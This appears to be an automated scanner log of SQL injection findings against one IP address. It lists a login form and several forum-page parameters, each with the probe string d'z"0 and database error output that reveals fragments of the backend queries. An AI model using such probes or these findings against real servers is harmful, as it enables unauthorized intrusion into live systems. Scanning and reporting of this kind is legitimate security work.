Target: http://210.38.207.15/ (GET)

---
URL:http://210.38.207.15/checkusr.asp (POST)
VulnName: sqli
Query: {u'username': u'cntvalue', u'I1': u'\u767b \u9646', u'pwd': u'cntvalue', u'kind': u'A', u'B1': u'\u91cd \u7f6e'}
Payload: d'z"0
Advice: use orm
Database: Microsoft SQL database
-----------1:
 <font face="宋体" size=2>
<p>Microsoft JET Database Engine</font> <font face="宋体" size=2>错误 '80040e14'</font>
<p>
<font face="宋体" size=2>语法错误 (操作符丢失) 在查询表达式 'username='cntvalued'z&quot;0' and pwd='cntvalue'' 中。</font>
<p>
<font face="宋体" size=2>/checkusr.asp</font><font face="宋体" size=2>，行 10</font> 
----------------
---
---
URL:http://210.38.207.15/bbs/detail.asp (GET)
VulnName: sqli
Query: {'boardid': '3', 'id': '644'}
Payload: d'z"0
Advice: use orm
Database: Microsoft SQL database
-----------1:
 <font face="宋体" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="宋体" size=2>错误 '80040e14'</font>
<p>
<font face="宋体" size=2>[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'id=644d'z&quot;0' 中。</font>
<p>
<font face="宋体" size=2>/bbs/detail.asp</font><font face="宋体" size=2>，行 6</font> 
----------------
---
---
URL:http://210.38.207.15/bbs/detail.asp (GET)
VulnName: sqli
Query: {'boardid': '4', 'id': '655'}
Payload: d'z"0
Advice: use orm
Database: Microsoft SQL database
-----------1:
 <font face="宋体" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="宋体" size=2>错误 '80040e14'</font>
<p>
<font face="宋体" size=2>[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'id=655d'z&quot;0' 中。</font>
<p>
<font face="宋体" size=2>/bbs/detail.asp</font><font face="宋体" size=2>，行 6</font> 
----------------
---
---
URL:http://210.38.207.15/bbs/detail.asp (GET)
VulnName: sqli
Query: {'boardid': '6', 'id': '580'}
Payload: d'z"0
Advice: use orm
Database: Microsoft SQL database
-----------1:
 <font face="宋体" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="宋体" size=2>错误 '80040e14'</font>
<p>
<font face="宋体" size=2>[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'id=580d'z&quot;0' 中。</font>
<p>
<font face="宋体" size=2>/bbs/detail.asp</font><font face="宋体" size=2>，行 6</font> 
----------------
---
---
URL:http://210.38.207.15/bbs/detail.asp (GET)
VulnName: sqli
Query: {'boardid': '4', 'id': '653'}
Payload: d'z"0
Advice: use orm
Database: Microsoft SQL database
-----------1:
 <font face="宋体" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="宋体" size=2>错误 '80040e14'</font>
<p>
<font face="宋体" size=2>[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'id=653d'z&quot;0' 中。</font>
<p>
<font face="宋体" size=2>/bbs/detail.asp</font><font face="宋体" size=2>，行 6</font> 
----------------
---
---
URL:http://210.38.207.15/bbs/detail.asp (GET)
VulnName: sqli
Query: {'boardid': '4', 'id': '652'}
Payload: d'z"0
Advice: use orm
Database: Microsoft SQL database
-----------1:
 <font face="宋体" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="宋体" size=2>错误 '80040e14'</font>
<p>
<font face="宋体" size=2>[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'id=652d'z&quot;0' 中。</font>
<p>
<font face="宋体" size=2>/bbs/detail.asp</font><font face="宋体" size=2>，行 6</font> 
----------------
---
---
URL:http://210.38.207.15/bbs/detail.asp (GET)
VulnName: sqli
Query: {'boardid': '4', 'id': '651'}
Payload: d'z"0
Advice: use orm
Database: Microsoft SQL database
-----------1:
 <font face="宋体" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="宋体" size=2>错误 '80040e14'</font>
<p>
<font face="宋体" size=2>[Microsoft][ODBC Microsoft Access Driver] 语法错误 (操作符丢失) 在查询表达式 'id=651d'z&quot;0' 中。</font>
<p>
<font face="宋体" size=2>/bbs/detail.asp</font><font face="宋体" size=2>，行 6</font> 
----------------
---